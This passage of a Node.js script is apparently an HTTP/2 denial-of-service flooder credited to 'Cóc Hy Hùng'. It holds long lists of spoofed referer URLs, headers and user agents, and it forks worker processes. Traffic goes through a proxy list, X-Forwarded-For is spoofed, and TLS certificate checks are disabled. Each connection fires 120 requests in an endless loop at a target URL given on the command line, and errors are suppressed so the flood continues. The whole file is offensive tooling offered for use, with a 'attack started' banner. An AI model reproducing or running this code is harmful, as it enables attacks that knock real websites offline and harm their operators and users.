    'https://www.google.us/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882',
    'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
    'http://www.google.ru/url?sa=t&rct=?j&q=&e..',
    'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
    'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
    'https://drive.google.com/viewerng/viewer?url=',
    'http://www.google.com/translate?u=',
    'https://developers.google.com/speed/pagespeed/insights/?url=',
    'http://help.baidu.com/searchResult?keywords=',
    'http://www.bing.com/search?q=',
    'https://add.my.yahoo.com/rss?url=',
    'https://play.google.com/store/search?q=',
    'http://www.google.com/?q=',
    'http://regex.info/exif.cgi?url=',
    'http://anonymouse.org/cgi-bin/anon-www.cgi/',
    'http://www.google.com/translate?u=',
    'http://translate.google.com/translate?u=',
    'http://validator.w3.org/feed/check.cgi?url=',
    'http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs=',
    'http://validator.w3.org/check?uri=',
    'http://jigsaw.w3.org/css-validator/validator?uri=',
    'http://validator.w3.org/checklink?uri=',
    'http://www.w3.org/RDF/Validator/ARPServlet?URI=',
    'http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile=',
    'http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile=',
    'http://validator.w3.org/mobile/check?docAddr=',
    'http://validator.w3.org/p3p/20020128/p3p.pl?uri=',
    'http://online.htmlvalidator.com/php/onlinevallite.php?url=',
    'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
    'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
    'https://drive.google.com/viewerng/viewer?url=',
    'http://www.google.com/translate?u=',
    'https://developers.google.com/speed/pagespeed/insights/?url=',
    'http://help.baidu.com/searchResult?keywords=',
    'http://www.bing.com/search?q=',
    'https://add.my.yahoo.com/rss?url=',
    'https://play.google.com/store/search?q=',
    'http://www.google.com/?q=',
    'http://regex.info/exif.cgi?url=',
    'http://anonymouse.org/cgi-bin/anon-www.cgi/',
    'http://www.google.com/translate?u=',
    'http://translate.google.com/translate?u=',
    'http://validator.w3.org/feed/check.cgi?url=',
    'http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs=',
    'http://validator.w3.org/check?uri=',
    'http://jigsaw.w3.org/css-validator/validator?uri=',
    'http://validator.w3.org/checklink?uri=',
    'http://www.w3.org/RDF/Validator/ARPServlet?URI=',
    'http://api.duckduckgo.com/html/?q=',
    'http://boorow.com/Pages/site_br_aspx?query=',
    'http://www.ask.com/web?q=',
    'http://search.lycos.com/web/?q=',
    'http://busca.uol.com.br/web/?q=',
    'http://us.yhs4.search.yahoo.com/yhs/search?p=',
    'http://www.heatwalkingcycling.org/index.php?pg=',
    'http://fresno.steinwaydealer.com/index.php?go=',
    'http://gbs.realwap.net/guest.php/putra.minang/www.klikvsikita.com/putra.minang/www.klikvsikita.com/cpanel.php?id=',
    'http://www.karplaw.com/index.php?go=',
    'http://www.veithsymposium.org/index.php?pg=',
    'http://www.zikgu.info/search.php?go=',
    'http://www.osronline.com/cf.cfm?PageURL=showlists.CFM?list=NTDEVpageurl=',
    'http://www.osronline.com/cf.cfm?PageURL=showlists.CFM?list=NTDEVpageurl=',
    'http://www.opensecrets.org/open=',
    'http://www.budogu.jp/cart/syscheck.cgi?url=',
    'http://abcnews.go.com/?page=',
    'http://www.budogu.jp/cart/syscheck.cgi?url=',
    'http://www.opensecrets.org/open=',
    'http://www.titantv.com/account/login.aspx?returnUrl=/Default.aspxreturn=',
    'http://www.webmd.com/lung/tc/acute-bronchitis-topic-overview?page=',
    'http://www.benefitmall.com/?TabID=36&emailurl=',
    'http://www.tolerance.org/?source=redirect&url=teachingtolerance?url=',
    'http://www.accuride.co.jp/cgi/check.cgi?url=',
    'http://www.caafcgilsicilia.it/?id_pagina=',
    'http://www.professioni24.ilsole24ore.com/?page=',
    'http://italia.virgilio.it/?ckset=force&amp;cityRedirect=falseredirect=',
    'http://oknabm.ru/index.php?pg=',
    'http://www.thrombosis2016.org/index.php?go=',
    'http://www.gotm.net/index.php?go=',
    'http://webmail.juno.com/?cf=spl&start_page=5&session_redirect=',
    'http://david.bach.profesores.ie.edu/?profesor=david.bach&pagina=',
    'http://javier.carrillo.profesores.ie.edu/?profesor=javier.carrillo&pagina=',
    'http://www.fabrizio.salvador.profesores.ie.edu/?profesor=fabrizio.salvador&pagina=',
    'http://manuel.becerra.profesores.ie.edu/?profesor=manuel.becerra&pagina=',
    'http://efernandez-cantelli.profesores.ie.edu/?profesor=efernandez-cantelli&pagina=',
    'http://www.manuel.becerra.profesores.ie.edu/?profesor=manuel.becerra&pagina=',
    'http://www.marvin.com/?page=',
    'http://www.ivrr.de/proxy.php?url=',
    'http://validator.w3.org/checklink?uri=',
    'http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=',
    'http://www.rssboard.org/rss-validator/check.cgi?url=',
    'http://www2.ogs.state.ny.us/help/urlstatusgo.html?url=',
    'http://prodvigator.bg/redirect.php?url=',
    'http://validator.w3.org/feed/check.cgi?url=',
    'http://www.ccm.edu/redirect/goto.asp?myURL=',
    'http://forum.buffed.de/redirect.php?url=',
    'http://rissa.kommune.no/engine/redirect.php?url=',
    'http://www.sadsong.net/redirect.php?url=',
    'https://www.fvsbank.com/redirect.php?url=',
    'http://www.jerrywho.de/?s=/redirect.php?url=',
    'http://www.inow.co.nz/redirect.php?url=',
    'http://www.automation-drive.com/redirect.php?url=',
    'http://mytinyfile.com/redirect.php?url=',
    'http://ruforum.mt5.com/redirect.php?url=',
    'http://www.websiteperformance.info/redirect.php?url=',
    'http://www.airberlin.com/site/redirect.php?url=',
    'http://www.rpz-ekhn.de/mail2date/ServiceCenter/redirect.php?url=',
    'http://evoec.com/review/redirect.php?url=',
    'http://www.crystalxp.net/redirect.php?url=',
    'http://watchmovies.cba.pl/articles/includes/redirect.php?url=',
    'http://www.seowizard.ir/redirect.php?url=',
    'http://apke.ru/redirect.php?url=',
    'http://seodrum.com/redirect.php?url=',
    'http://redrool.com/redirect.php?url=',
    'http://blog.eduzones.com/redirect.php?url=',
    'http://www.onlineseoreportcard.com/redirect.php?url=',
    'http://www.wickedfire.com/redirect.php?url=',
    'http://searchtoday.info/redirect.php?url=',
    'http://www.bobsoccer.ru/redirect.php?url=',
    'http://newsdiffs.org/article-history/iowaairs.org/redirect.php?url=',
    'http://www.firmia.cz/redirect.php?url=',
    'http://palinstravels.co.uk/redirect.php?url=',
    'http://www.phuketbranches.com/admin/redirect.php?url=',
    'http://tools.strugacreative.com/redirect.php?url=',
    'http://www.elec-intro.com/redirect.php?url=',
    'http://maybeit.net/redirect.php?url=',
    'http://www.usgpru.net/redirect.php?url=',
    'http://openwebstuff.com/wp-content/plugins/wp-js-external-link-info/redirect.php?url=',
    'http://www.webaverage.com/redirect.php?url=',
    'http://www.seorehash.com/redirect.php?url=',
    'http://www.seo.khabarsaz.net/redirect.php?url=',
    'http://www.dimension-marketing.net/outils/seo/audit/redirect.php?url=',
    'http://www.informeseogratis.com/redirect.php?url=',
    'http://www.websites-canada.com/redirect.php?url=',
    'http://zakaztovarov.net/redirect.php?url=',
    'http://anonymouse.org/cgi-bin/anon-www.cgi/',
    'http://www.marumura.com/redirect.php?url=',
    'http://old.leginet.eu/redirect.php?url=',
    'http://www.am-segelhafen-hotel.com/files/ash_hotel/proxy.php?url=',
    'http://www.tuangou.do/proxy.php?url=',
    'http://www.gvpl.ca/url/proxy.php?url=',
    'http://weiter-lesen.net/web/proxy.php?url=',
    'http://soroka-vorovka.com/proxy/proxy.php?url=',
    'http://www.cogsci.ed.ac.uk/~richard/xml-check.cgi?url=',
    'http://pro.athealth.co.jp/cgi-bin/pro/check.cgi?url=',
    'http://ukrhome.net/go.php?url=',
    'http://www.aliancaandroid.com/go.php?url=',
    'http://www.hangglider.kiev.ua/go.php?url=',
    'http://it4pal.com/ar/go.php?url=',
    'http://paperplane.su/go.php?url=',
    'http://www.education.net.au/go.php?url=',
    'http://www.bloggerexp.com/go.php?url=',
    'http://www.lifetype.ru/go.php?url=',
    'http://blogerator.ru/go.php?url=',
    'http://www.hella.ru/go.php?url=',
    'http://fcmanutd.com/go.php?url=',
    'http://www.sitysoft.com/go.php?url=',
    'https://www.google.com/interstitial?url=',
    'http://www.flashreport.org/blog/go.php?url=',
    'http://www.otworld.de/go.php?url=',
    'http://www.ennk.ru/go.php?url=',
    'http://www.xoxohth.com/go.php?url=',
    'http://dochtm.com/go.php?url=',
    'http://www.autoadmit.com/go.php?url=',
    'http://www.vttour.fr/actu/go.php?url=',
    'http://www.geodream.ru/go.php?url=',
    'http://jp.trefoil.tv/go.php?url=',
    'http://irc.ifmo.ru/go.php?url=',
],
lang_header = [
    'he-IL,he;q=0.9,en-US;q=0.8,en;q=0.7',
    'fr-CH, fr;q=0.9, en;q=0.8, de;q=0.7, *;q=0.5',
    'en-US,en;q=0.5',
    'en-US,en;q=0.9',
    'de-CH;q=0.7',
    'da, en-gb;q=0.8, en;q=0.7',
    'cs;q=0.5'
],
encoding_header = [
    'deflate, gzip;q=1.0, *;q=0.5',
    'gzip, deflate, br',
    '*'
],
control_header = [
    'no-cache',
    'no-store',
    'no-transform',
    'only-if-cached',
    'max-age=0'
],
ua = [
    "Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46",
    "Mozilla/5.0 (X11; CrOS x86_64 13982.82.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.157 Safari/537.36",
    "Mozilla/5.0 (Linux; Android 11; M2102K1G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36",
    "Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36",
    "Mozilla/5.0 (Linux; Android 10; NOH-NX9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36",
    "Mozilla/5.0 (Linux; Android 11; V2045) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/36.0  Mobile/15E148 Safari/605.1.15",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (iPhone12,8; U; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1",
    "Mozilla/5.0 (iPhone13,3; U; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/15E148 Safari/602.1",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/13.2b11866 Mobile/16A366 Safari/605.1.15",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15",
    "Mozilla/5.0 (Linux; Android 10; SM-610N Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/80.0.3987.119 Mobile Safari/537.36",
  ],
ignoreNames = ['RequestError', 'StatusCodeError', 'CaptchaError', 'CloudflareError', 'ParseError', 'ParserError'],
ignoreCodes = ['SELF_SIGNED_CERT_IN_CHAIN', 'ECONNRESET', 'ERR_ASSERTION', 'ECONNREFUSED', 'EPIPE', 'EHOSTUNREACH', 'ETIMEDOUT', 'ESOCKETTIMEDOUT', 'EPROTO'];
process.on('uncaughtException', function (e) {
if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return !1;
    //console.warn(e);
}).on('unhandledRejection', function (e) {
if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return !1;
    //console.warn(e);
}).on('warning', e => {
if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return !1;
    //console.warn(e);
}).setMaxListeners(0);
function accept() {
    return accept_header[Math.floor(Math.random() * accept_header.length)];
}

function lang() {
    return lang_header[Math.floor(Math.random() * lang_header.length)];
}

function encoding() {
    return encoding_header[Math.floor(Math.random() * encoding_header.length)];
}

function controling() {
    return control_header[Math.floor(Math.random() * control_header.length)];
}

function cipher() {
    return cplist[Math.floor(Math.random() * cplist.length)];
}
//var fileName = __filename;
//var file = path.basename(fileName);

if (process.argv.length < 4){
    console.clear()
    const ascii = gradient.vice(`
            ▄ .▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄·    ▄▄▄▄·  ▄· ▄▌ ▄▄▄· ▄▄▄· .▄▄ · .▄▄ · 
            ██▪▐█•██  •██  ▐█ ▄█    ▐█ ▀█▪▐█▪██▌▐█ ▄█▐█ ▀█ ▐█ ▀. ▐█ ▀. 
            ██▀▐█ ▐█.▪ ▐█.▪ ██▀·    ▐█▀▀█▄▐█▌▐█▪ ██▀·▄█▀▀█ ▄▀▀▀█▄▄▀▀▀█▄
            ██▌▐▀ ▐█▌· ▐█▌·▐█▪·•    ██▄▪▐█ ▐█▀·.▐█▪·•▐█ ▪▐▌▐█▄▪▐█▐█▄▪▐█
            ▀▀▀ · ▀▀▀  ▀▀▀ .▀       ·▀▀▀▀   ▀ • .▀    ▀  ▀  ▀▀▀▀  ▀▀▀▀                                                    
  `)
    console.log(ascii)
    //console.log('HTTP/2 (Support HTTPS Only)');
    console.log('node ' +  'http2.js ' + '<URL> <TIME> <THREADS> <GET/POST/HEAD>');
    //console.log(process.argv.length);
    const ex = gradient.vice('HTTP/2 (Support HTTPS Only) \nEx. node http2.js https://www.google.com/ 100 5 HEAD\ndeveloper: Cóc Hy Hùng')
    console.log(ex)
    process.exit(0);
}

proxys = fs.readFileSync("HTTP2/http.txt", 'utf-8').toString().match(/\S+/g);
//ua = fs.readFileSync("HTTP2/user-agent/ua.txt", 'utf-8').toString().match(/\S+/g);
function proxyr() {
    return proxys[Math.floor(Math.random() * proxys.length)];
}

if(cluster.isMaster) {
const dateObj = new Date();
    for(var bb=0;bb<process.argv[4];bb++) {
        cluster.fork();
    }
    setTimeout(() => {
        process.exit(-1)
    }, process.argv[3] * 1000)
}else {
    function flood() {
        var parsed = url.parse(process.argv[2]);
        const uas = fakeua();
        var cipper = cipher()
        var proxy = proxyr().split(':')
        var header = {
            ":path": parsed.path,
            "X-Forwarded-For": proxy[0],
            "X-Forwarded-Host": proxy[0],
            "Referer": referers[Math.floor(Math.random() * referers.length)],
            ":method": process.argv[5],
            //"User-agent": uas,
            "User-agent": ua[Math.floor(Math.random() * ua.length)],
            "Origin": process.argv[2],
            "Accept": accept(),
            "Accept-Encoding": encoding(),
            "Accept-Language": lang(),
            //"Connection": 'keep-alive',
            //"Cache-Control": 'no-cache',
            "Cache-Control": controling(),
            //"Content-Type": Content_type(),
        }
        //var urls = url.parse(process.argv[2]);
           /*if (process.argv.length > 2){
            console.clear()
            const ascii = gradient.vice(`
            ▄ .▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄·    ▄▄▄▄·  ▄· ▄▌ ▄▄▄· ▄▄▄· .▄▄ · .▄▄ · 
            ██▪▐█•██  •██  ▐█ ▄█    ▐█ ▀█▪▐█▪██▌▐█ ▄█▐█ ▀█ ▐█ ▀. ▐█ ▀. 
            ██▀▐█ ▐█.▪ ▐█.▪ ██▀·    ▐█▀▀█▄▐█▌▐█▪ ██▀·▄█▀▀█ ▄▀▀▀█▄▄▀▀▀█▄
            ██▌▐▀ ▐█▌· ▐█▌·▐█▪·•    ██▄▪▐█ ▐█▀·.▐█▪·•▐█ ▪▐▌▐█▄▪▐█▐█▄▪▐█
            ▀▀▀ · ▀▀▀  ▀▀▀ .▀       ·▀▀▀▀   ▀ • .▀    ▀  ▀  ▀▀▀▀  ▀▀▀▀                                                    
  `)
            console.log(ascii)
            const httponly = gradient.vice(`HTTP/2 (Support HTTPS Only)`);
            console.log(httponly)
            //console.log('HTTP2-BYPASS ' +  url + '\ndeveloper Cóc Hy Hùng');
            
            console.log('DEVELOPER: Cóc Hy Hùng')
            //console.log(process.argv.length);
            //process.exit(0);
            
           console.log('attack started')
        } */
if (process.argv[5] !== undefined){
    console.log("(!) you haven't added the method yet");
    process.exit(0);
}
        const agent = new http.Agent({
            keepAlive: true,
            keepAliveMsecs: 10000,
            maxSockets: 0,
        });
        var req = http.request({
            host: proxy[0],
            agent: agent,
            globalAgent: agent,
            port: proxy[1],
            headers: {
                'Host': parsed.host,
                'Proxy-Connection': 'Keep-Alive',
                'Connection': 'Keep-Alive',
            },
            method: 'CONNECT',
            path: parsed.host+':443'
        }, function(){ 
            req.setSocketKeepAlive(true);
        });
        tls.DEFAULT_MIN_VERSION = 'TLSv1.1';
        tls.DEFAULT_MAX_VERSION = 'TLSv1.3';
        req.on('connect', function (res, socket, head) { 
            const client = http2.connect(parsed.href, {
                createConnection: () => tls.connect({
                    host: parsed.host,
                    ciphers: cipper, 
                    secureProtocol: 'TLS_method',
                    TLS_MAX_VERSION: '1.2',
                    servername: parsed.host,
                    secure: true,
                    rejectUnauthorized: false,
                    ALPNProtocols: ['h2'],
                    socket: socket
                }, function () {
                    for (let i = 0; i< 120; i++){
                        const req = client.request(header);
                        req.setEncoding('utf8');
                        req.on('data', (chunk) => {
                            // data += chunk;
                        });
                        req.on("response", () => {
                            req.close();
                        })
                        req.end();
                    }
                })
            });
        });
        req.end();
    }
    setInterval(() => { flood() })
  }